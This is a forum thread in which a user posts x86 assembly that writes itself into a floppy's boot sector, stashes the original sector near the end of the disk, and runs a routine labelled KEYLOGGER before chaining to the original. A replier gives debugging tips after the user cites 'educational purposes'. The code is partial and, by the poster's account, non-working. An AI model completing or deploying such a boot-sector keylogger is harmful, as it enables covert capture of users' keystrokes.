Page 1 of 2
install code at boot sector of floppy
Posted: Thu Sep 20, 2018 12:14 am
by bruninho
I am trying to install my code onto boot sector however the floppy disk don't boot with my code injected. Here is part of my source:
Code: Select all
mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h
LEA DI,[SETOR+3EH]
MOV SI,CODE
MOV CX,1C0h
REP MOVSB
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es
;push cx
;push dx
sub cl,6
;lea bx,[setor+3Eh]
mov bx,SETOR
mov ax,301h
mov dl,0h
int 13h
;pop dx
;pop cx
mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H
ret
CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf
cli
IN AL,64H
...
What is wrong in my source above?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 1:14 am
by Octocontrabass
How do you know the problem is with the code you've shown here, and not something else?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 1:33 am
by bruninho
Octocontrabass wrote:How do you know the problem is with the code you've shown here, and not something else?
Because the OS just should boot from this code at bootstrap sector.
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 1:39 am
by Octocontrabass
Have you checked the disk using a hex editor to see if your code was successfully written to the disk?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 1:44 am
by bruninho
Octocontrabass wrote:Have you checked the disk using a hex editor to see if your code was successfully written to the disk?
Yes. The boot sector was modified however it dont is writed at last sector - 6 that should be saved at final of disk.
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 1:57 am
by Octocontrabass
Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 2:13 am
by bruninho
Octocontrabass wrote:Check the return values from the INT 0x13 call. Does the BIOS say the write was successful?
I already check the values at AH register and the INT 13h was writed sucessfully. I am already afraid beacause i dont understand what is happening
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 2:16 am
by bruninho
I think the error is:
Code: Select all
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV AX,301H
MOV CX,1
INT 13H
MOV DL,0
INT 19H
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 2:21 am
by Octocontrabass
Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 2:28 am
by bruninho
Octocontrabass wrote:Are you trying to back up and restore the original boot sector? You're not backing up the original boot sector, so you can't restore it.
Yes i write the original bootstrap sector at 6 last sectors.
Why you say that i not backup the 1st sector?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 2:46 am
by Octocontrabass
Because you never write the original first sector back to the disk.
- You read the first sector to a buffer in memory
- You modify the buffer
- You write the modified buffer to a sector near the end of the disk
- You write the modified buffer to the first sector
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 3:43 am
by bruninho
I've modified my source code however it don't solve my problem. The Operating System don't bootstrap with this source:
Code: Select all
mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es
mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H
LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es
mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H
ret
CODE:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf
.............
IN AL,64H
.............
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H
BUF db 2048 dup (0)
SETOR db 512 dup(0)
What should i do?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 4:11 am
by Octocontrabass
Why are you writing a keylogger?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 4:22 am
by bruninho
Octocontrabass wrote:Why are you writing a keylogger?
For educational purposes.
See my source that still dont work:
Code: Select all
mov ax,201h
mov bx,SETOR
mov cx,1
mov dx,0
int 13h
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es
mov ax,301h
sub cl,6
mov dl,0
mov bx,SETOR
INT 13H
LEA DI,[SETOR+3EH]
MOV SI,KEYLOGGER
MOV CX,1C0h
REP MOVSB
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
INT 13H
pop es
mov bx,SETOR
mov ax,301h
mov cx,1
mov dh,0
mov dl,0h
INT 13H
ret
KEYLOGGER:
xor ax,ax
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
mov di,600h
mov si,7c00h
mov cx,512
cld
rep movsb
push ax
push 61Ch
retf
IN AL,64H
mov ah,8
mov dl,0h
mov di,0
push es
mov es,di
pop es
INT 13H
SUB CL,6
MOV AX,201H
MOV DL,0H
;MOV DH,0
MOV BX,SETOR
INT 13H
MOV DL,0
MOV AX,301H
MOV CX,1
;CS
MOV BX,SETOR
INT 13H
MOV DL,0
INT 19H
BUF db 2048 dup (0)
SETOR db 512 dup(0)
And still dont bootstrap with floppy disk. Why?
Re: install code at boot sector of floppy
Posted: Thu Sep 20, 2018 5:08 am
by Octocontrabass
Code: Select all
mov ss,ax
mov ds,ax
mov es,ax
mov sp,7C00h
Any MOV to SS must be followed immediately by a MOV to SP. Having instructions between them can cause issues.
Are you sure this is the right value? Perhaps you should use label arithmetic to come up with it instead. (Also, since the address is a constant, you can use a far JMP instead of a far RET.)
I think you copy-pasted this code in the wrong order.
Will this label evaluate to a reasonable address if you use it inside your "keylogger"?